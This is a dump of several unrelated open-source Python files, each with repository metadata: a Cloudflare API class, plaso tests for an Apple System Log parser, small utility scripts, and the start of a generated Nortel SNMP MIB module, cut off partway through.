return factorial(num-1) * num
print(factorial(5)) | 15.888889 | 33 | 0.615385 | 23 | 143 | 3.826087 | 0.652174 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063636 | 0.230769 | 143 | 9 | 34 | 15.888889 | 0.736364 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cecbc7a83d800700a0bc3e1e1e13789a0d1223c | 140 | py | Python | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 2 | 2021-09-14T13:20:55.000Z | 2022-02-24T14:18:24.000Z | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 46 | 2021-09-08T08:39:45.000Z | 2022-03-29T12:31:05.000Z | aiocloudflare/api/accounts/roles/roles.py | Stewart86/aioCloudflare | 341c0941f8f888a8b7e696e64550bce5da4949e6 | [
"MIT"
] | 1 | 2021-12-30T23:02:23.000Z | 2021-12-30T23:02:23.000Z | from aiocloudflare.commons.auth import Auth
class Roles(Auth):
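# Endpoint path segments for the Cloudflare account roles resource; presumably assembled into the request URL by the Auth base class.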
_endpoint1 = "accounts"
_endpoint2 = "roles"
_endpoint3 = None
| 17.5 | 43 | 0.707143 | 15 | 140 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.207143 | 140 | 7 | 44 | 20 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0.092857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7ceec091cb6f866e1695e04948d008917f13dd0f | 10,228 | py | Python | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | 2 | 2019-10-23T03:37:59.000Z | 2020-08-14T17:09:26.000Z | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | tests/parsers/asl.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for Apple System Log file parser."""
import unittest
from plaso.lib import errors
from plaso.parsers import asl
from tests.parsers import test_lib
class ASLParserTest(test_lib.ParserTestCase):
"""Tests for Apple System Log file parser."""
# pylint: disable=protected-access
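# Raw Apple System Log (ASL) record used as test input by the parser tests below.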
_TEST_RECORD = bytes(bytearray([
0x00, 0x01, 0x00, 0x00, 0x00, 0x14, 0x44, 0x61, 0x72, 0x6b, 0x54, 0x65,
0x6d, 0x70, 0x6c, 0x61, 0x72, 0x2d, 0x32, 0x2e, 0x6c, 0x6f, 0x63, 0x61,
0x6c, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0a, 0x6c, 0x6f, 0x63, 0x61,
0x74, 0x69, 0x6f, 0x6e, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x14,
0x63, 0x6f, 0x6d, 0x2e, 0x61, 0x70, 0x70, 0x6c, 0x65, 0x2e, 0x6c, 0x6f,
0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x11, 0x43, 0x46, 0x4c, 0x6f, 0x67, 0x20, 0x4c, 0x6f, 0x63, 0x61,
0x6c, 0x20, 0x54, 0x69, 0x6d, 0x65, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x18, 0x32, 0x30, 0x31, 0x33, 0x2d, 0x31, 0x31, 0x2d, 0x32, 0x35, 0x20,
0x30, 0x39, 0x3a, 0x34, 0x35, 0x3a, 0x33, 0x35, 0x2e, 0x37, 0x30, 0x31,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0d, 0x43, 0x46, 0x4c, 0x6f, 0x67,
0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x96, 0x49, 0x6e, 0x63, 0x6f, 0x72, 0x72, 0x65, 0x63, 0x74, 0x20,
0x4e, 0x53, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x45, 0x6e, 0x63, 0x6f,
0x64, 0x69, 0x6e, 0x67, 0x20, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x20, 0x30,
0x78, 0x38, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x20, 0x64, 0x65, 0x74,
0x65, 0x63, 0x74, 0x65, 0x64, 0x2e, 0x20, 0x41, 0x73, 0x73, 0x75, 0x6d,
0x69, 0x6e, 0x67, 0x20, 0x4e, 0x53, 0x41, 0x53, 0x43, 0x49, 0x49, 0x53,
0x74, 0x72, 0x69, 0x6e, 0x67, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x69, 0x6e,
0x67, 0x2e, 0x20, 0x57, 0x69, 0x6c, 0x6c, 0x20, 0x73, 0x74, 0x6f, 0x70,
0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74,
0x69, 0x62, 0x6c, 0x69, 0x74, 0x79, 0x20, 0x6d, 0x61, 0x70, 0x70, 0x69,
0x6e, 0x67, 0x20, 0x62, 0x65, 0x68, 0x61, 0x76, 0x69, 0x6f, 0x72, 0x20,
0x69, 0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x6e, 0x65, 0x61, 0x72, 0x20,
0x66, 0x75, 0x74, 0x75, 0x72, 0x65, 0x2e, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x11, 0x53, 0x65, 0x6e, 0x64, 0x65, 0x72, 0x5f, 0x4d, 0x61, 0x63,
0x68, 0x5f, 0x55, 0x55, 0x49, 0x44, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x25, 0x35, 0x30, 0x45, 0x31, 0x46, 0x37, 0x36, 0x41, 0x2d, 0x36, 0x30,
0x46, 0x46, 0x2d, 0x33, 0x36, 0x38, 0x43, 0x2d, 0x42, 0x37, 0x34, 0x45,
0x2d, 0x45, 0x42, 0x34, 0x38, 0x46, 0x36, 0x44, 0x39, 0x38, 0x43, 0x35,
0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x03, 0xce, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x8c, 0x1e,
0x00, 0x00, 0x00, 0x00, 0x52, 0x93, 0x1c, 0x3f, 0x2a, 0x0c, 0xc9, 0x28,
0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0xcd,
0x00, 0x00, 0x00, 0xcd, 0x00, 0x00, 0x00, 0xcd, 0xff, 0xff, 0xff, 0xff,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1a,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5b,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0x84, 0x31, 0x30, 0x30,
0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x28,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]))
def testParseRecord(self):
"""Tests the _ParseRecord function."""
parser = asl.ASLParser()
storage_writer = self._CreateStorageWriter()
parser_mediator = self._CreateParserMediator(storage_writer)
file_object = self._CreateFileObject('asl', self._TEST_RECORD)
next_record_offset = parser._ParseRecord(parser_mediator, file_object, 362)
self.assertEqual(next_record_offset, 974)
# Test with log entry descriptor data too small.
file_object = self._CreateFileObject('asl', self._TEST_RECORD[:452])
with self.assertRaises(errors.ParseError):
parser._ParseRecord(parser_mediator, file_object, 362)
# TODO: test with invalid additional data size.
def testParseRecordExtraField(self):
"""Tests the _ParseRecordExtraField function."""
parser = asl.ASLParser()
extra_field_map = parser._GetDataTypeMap('asl_record_extra_field')
extra_field = extra_field_map.CreateStructureValues(
name_string_offset=10, value_string_offset=20)
extra_field_data = extra_field_map.FoldByteStream(extra_field)
extra_field_value = parser._ParseRecordExtraField(extra_field_data, 0)
self.assertEqual(extra_field_value.name_string_offset, 10)
self.assertEqual(extra_field_value.value_string_offset, 20)
# Test with extra field data too small.
with self.assertRaises(errors.ParseError):
parser._ParseRecordExtraField(extra_field_data[:-1], 0)
def testParseRecordString(self):
"""Tests the _ParseRecordString function."""
parser = asl.ASLParser()
string_map = parser._GetDataTypeMap('asl_record_string')
string = string_map.CreateStructureValues(
unknown1=0, string_size=4, string='test')
string_data = string_map.FoldByteStream(string)
# Prefix the string data with 4 bytes since string offset cannot be 0.
string_data = b''.join([b'\x00\x00\x00\x00', string_data])
string_value = parser._ParseRecordString(string_data, 0, 0)
self.assertIsNone(string_value)
string_value = parser._ParseRecordString(string_data, 0, 4)
self.assertEqual(string_value, 'test')
# Test with string data too small.
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(string_data[:-1], 0, 4)
# Test with inline string data.
string_value = parser._ParseRecordString(b'', 0, 0x8474657374000000)
self.assertEqual(string_value, 'test')
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0xf474657374000000)
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0x8f74657374000000)
with self.assertRaises(errors.ParseError):
parser._ParseRecordString(b'', 0, 0x84ffffffff000000)
def testGetFormatSpecification(self):
"""Tests the GetFormatSpecification function."""
format_specification = asl.ASLParser.GetFormatSpecification()
self.assertIsNotNone(format_specification)
def _CreateFileHeaderData(self, parser):
"""Creates file header test data.
Args:
parser (ASLParser): ASL parser.
Returns:
bytes: file header test data.
"""
file_header_map = parser._GetDataTypeMap('asl_file_header')
unknown1_data = b'\x00' * 36
file_header = file_header_map.CreateStructureValues(
signature=b'ASL DB\x00\x00\x00\x00\x00\x00', format_version=2,
first_log_entry_offset=80, creation_time=0, cache_size=0,
last_log_entry_offset=0, unknown1=unknown1_data)
return file_header_map.FoldByteStream(file_header)

  def testParseFileObject(self):
    """Tests the ParseFileObject function."""
    parser = asl.ASLParser()
    file_header_data = self._CreateFileHeaderData(parser)

    storage_writer = self._CreateStorageWriter()
    parser_mediator = self._CreateParserMediator(storage_writer)

    file_object = self._CreateFileObject('asl', file_header_data)
    parser.ParseFileObject(parser_mediator, file_object)

    self.assertEqual(storage_writer.number_of_warnings, 0)
    self.assertEqual(storage_writer.number_of_events, 0)

    # Test with file header data too small.
    file_object = self._CreateFileObject('asl', file_header_data[:-1])
    with self.assertRaises(errors.UnableToParseFile):
      parser.ParseFileObject(parser_mediator, file_object)

    # Test with invalid signature.
    file_object = self._CreateFileObject(
        'asl', b''.join([b'\xff\xff\xff\xff', file_header_data[4:]]))

    storage_writer = self._CreateStorageWriter()
    parser_mediator = self._CreateParserMediator(storage_writer)

    with self.assertRaises(errors.UnableToParseFile):
      parser.ParseFileObject(parser_mediator, file_object)

    # Test with first record data too small.
    file_object = self._CreateFileObject('asl', b''.join([
        file_header_data, self._TEST_RECORD[:452]]))
    parser.ParseFileObject(parser_mediator, file_object)

    self.assertEqual(storage_writer.number_of_warnings, 1)
    self.assertEqual(storage_writer.number_of_events, 0)

  def testParse(self):
    """Tests the Parse function."""
    parser = asl.ASLParser()
    storage_writer = self._ParseFile(['applesystemlog.asl'], parser)

    self.assertEqual(storage_writer.number_of_warnings, 0)
    self.assertEqual(storage_writer.number_of_events, 2)

    events = list(storage_writer.GetEvents())

    # Note that "compatiblity" is spelt incorrectly in the actual message being
    # tested here.
    expected_event_values = {
        'computer_name': 'DarkTemplar-2.local',
        'data_type': 'mac:asl:event',
        'extra_information': (
            'CFLog Local Time: 2013-11-25 09:45:35.701, '
            'CFLog Thread: 1007, '
            'Sender_Mach_UUID: 50E1F76A-60FF-368C-B74E-EB48F6D98C51'),
        'facility': 'com.apple.locationd',
        'group_id': 205,
        'level': 4,
        'message': (
            'Incorrect NSStringEncoding value 0x8000100 detected. '
            'Assuming NSASCIIStringEncoding. Will stop this compatiblity '
            'mapping behavior in the near future.'),
        'message_id': 101406,
        'pid': 69,
        'read_gid': -1,
        'read_uid': 205,
        'record_position': 442,
        'sender': 'locationd',
        'timestamp': '2013-11-25 09:45:35.705481',
        'user_sid': '205'}

    self.CheckEventValues(storage_writer, events[0], expected_event_values)


if __name__ == '__main__':
  unittest.main()
| 42.794979 | 79 | 0.683809 | 1,316 | 10,228 | 5.163374 | 0.218085 | 0.161295 | 0.180132 | 0.1766 | 0.462104 | 0.414717 | 0.361442 | 0.272701 | 0.226343 | 0.178219 | 0 | 0.209805 | 0.194271 | 10,228 | 238 | 80 | 42.97479 | 0.614731 | 0.092491 | 0 | 0.183544 | 0 | 0 | 0.072267 | 0.011519 | 0 | 0 | 0.240057 | 0.004202 | 0.132911 | 1 | 0.044304 | false | 0 | 0.025316 | 0 | 0.088608 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cef36bc0025f56675335f7db3a0fe2078984246 | 46 | py | Python | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | 2 | 2021-04-05T15:29:08.000Z | 2022-03-08T11:07:21.000Z | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | null | null | null | Knowledge/Python/variables.py | thealexcesar/Harvard-CS50-Web | f099e7cf3d3c7f081dd4cb564d35ab6f5ff52bdf | [
"MIT"
] | null | null | null | a = 28
b = 1.5
c = "Hello!"
d = True
e = None
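# The assignments above illustrate Python's basic built-in value types:
# int, float, str, bool and NoneType.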
| 7.666667 | 12 | 0.478261 | 11 | 46 | 2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 0.326087 | 46 | 5 | 13 | 9.2 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b06a0bf4f6d6883c503d6354aadfeff8918c158 | 210 | py | Python | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | 244 | 2019-09-06T07:53:57.000Z | 2022-03-28T19:32:15.000Z | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | null | null | null | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | 61 | 2019-09-14T07:06:57.000Z | 2022-03-16T07:02:52.000Z | import json
with open("test_rand_split.jsonl", 'r') as fw:
for line in open("test_rand_split.jsonl", 'r').readlines():
data = json.loads(line.strip())
print(data["id"]+','+data["answerKey"]) | 42 | 63 | 0.628571 | 31 | 210 | 4.129032 | 0.677419 | 0.125 | 0.1875 | 0.265625 | 0.359375 | 0.359375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 210 | 5 | 64 | 42 | 0.731429 | 0 | 0 | 0 | 0 | 0 | 0.265403 | 0.199052 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b0782a9e582959a13bad44c331bf33e0963ce20 | 448 | py | Python | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 7 | 2015-04-10T07:42:53.000Z | 2016-01-20T16:46:48.000Z | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 4 | 2015-09-01T19:39:43.000Z | 2015-09-06T17:57:27.000Z | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 1 | 2016-12-05T16:27:59.000Z | 2016-12-05T16:27:59.000Z | from sqlalchemy import or_, and_
from atomicpress.app import app
from atomicpress.models import Post, PostStatus


def gen_post_status():
    """
    Show only published posts outside debug.
    """
    if not app.config["DEBUG"]:
        post_status = and_(Post.status == PostStatus.PUBLISH)
    else:
        post_status = or_(Post.status == PostStatus.PUBLISH,
                          Post.status == PostStatus.DRAFT)
    return post_status
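# Usage sketch (hypothetical query, assuming Flask-SQLAlchemy style model access):
#   published = Post.query.filter(gen_post_status()).all()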
| 24.888889 | 61 | 0.658482 | 53 | 448 | 5.396226 | 0.490566 | 0.244755 | 0.20979 | 0.188811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252232 | 448 | 17 | 62 | 26.352941 | 0.853731 | 0.089286 | 0 | 0 | 0 | 0 | 0.012755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b08b63255aa6aef6063d2bb955dc708928c668c | 177 | py | Python | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | import pandas as pd
import os


def load(file_name):
    file_path = os.path.join('../../data/external/', file_name)
    data = pd.read_csv(file_path, index_col=0)
return data | 25.285714 | 62 | 0.694915 | 30 | 177 | 3.9 | 0.633333 | 0.136752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.163842 | 177 | 7 | 63 | 25.285714 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
6b17d5bee29a57e35b7da4ad3f75206d512304bf | 44,731 | py | Python | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Nortel-MsCarrier-MscPassport-DataCollectionMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-DataCollectionMIB
# Produced by pysmi-0.3.4 at Wed May 1 14:29:37 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
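# Loading sketch (assumes pysnmp is installed and the dependent compiled MIB
# modules are on the search path; the directory below is hypothetical):
#   from pysnmp.smi import builder
#   mibBuilder = builder.MibBuilder()
#   mibBuilder.addMibSources(builder.DirMibSource('/path/to/compiled/mibs'))
#   mibBuilder.loadModules('Nortel-MsCarrier-MscPassport-DataCollectionMIB')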
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection")
Unsigned32, RowStatus, Integer32, Gauge32, DisplayString, Counter32, StorageType = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Unsigned32", "RowStatus", "Integer32", "Gauge32", "DisplayString", "Counter32", "StorageType")
NonReplicated, EnterpriseDateAndTime, AsciiString = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated", "EnterpriseDateAndTime", "AsciiString")
mscComponents, mscPassportMIBs = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscComponents", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, TimeTicks, Counter64, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Bits, Gauge32, IpAddress, Counter32, NotificationType, iso, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "TimeTicks", "Counter64", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Bits", "Gauge32", "IpAddress", "Counter32", "NotificationType", "iso", "ModuleIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
dataCollectionMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14))
mscCol = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21))
mscColRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1), )
if mibBuilder.loadTexts: mscColRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatusTable.setDescription('This entry controls the addition and deletion of mscCol components.')
mscColRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatusEntry.setDescription('A single entry in the table represents a single mscCol component.')
mscColRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscCol components. These components can be added.')
mscColComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStorageType.setDescription('This variable represents the storage type value for the mscCol tables.')
mscColIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("accounting", 0), ("alarm", 1), ("log", 2), ("debug", 3), ("scn", 4), ("trap", 5), ("stats", 6))))
if mibBuilder.loadTexts: mscColIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColIndex.setDescription('This variable represents the index for the mscCol tables.')
mscColProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10), )
if mibBuilder.loadTexts: mscColProvTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColProvTable.setDescription('This group specifies all of the provisioning data for a DCS Collector.')
mscColProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColProvEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColProvEntry.setDescription('An entry in the mscColProvTable.')
mscColAgentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1, 1), Unsigned32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(20, 10000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColAgentQueueSize.setStatus('obsolete')
if mibBuilder.loadTexts: mscColAgentQueueSize.setDescription("This attribute has been replaced with the agentQueueSize attribute in the Lp Engineering DataStream Ov component. Upon migration, if the existing provisioned value of this attribute is the same as the system default for this type of data, no new components are added because the default is what the DataStream component already would be using. Otherwise, if the value is not the same as the system default, then for each Lp which is provisioned at the time of the migration, a DataStream is provisioned and the Ov's agentQueueSize is set to the non-default value.")
mscColStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11), )
if mibBuilder.loadTexts: mscColStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStatsTable.setDescription('This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStatsEntry.setDescription('An entry in the mscColStatsTable.')
mscColCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 2), Counter32()).setMaxAccess("readonly")
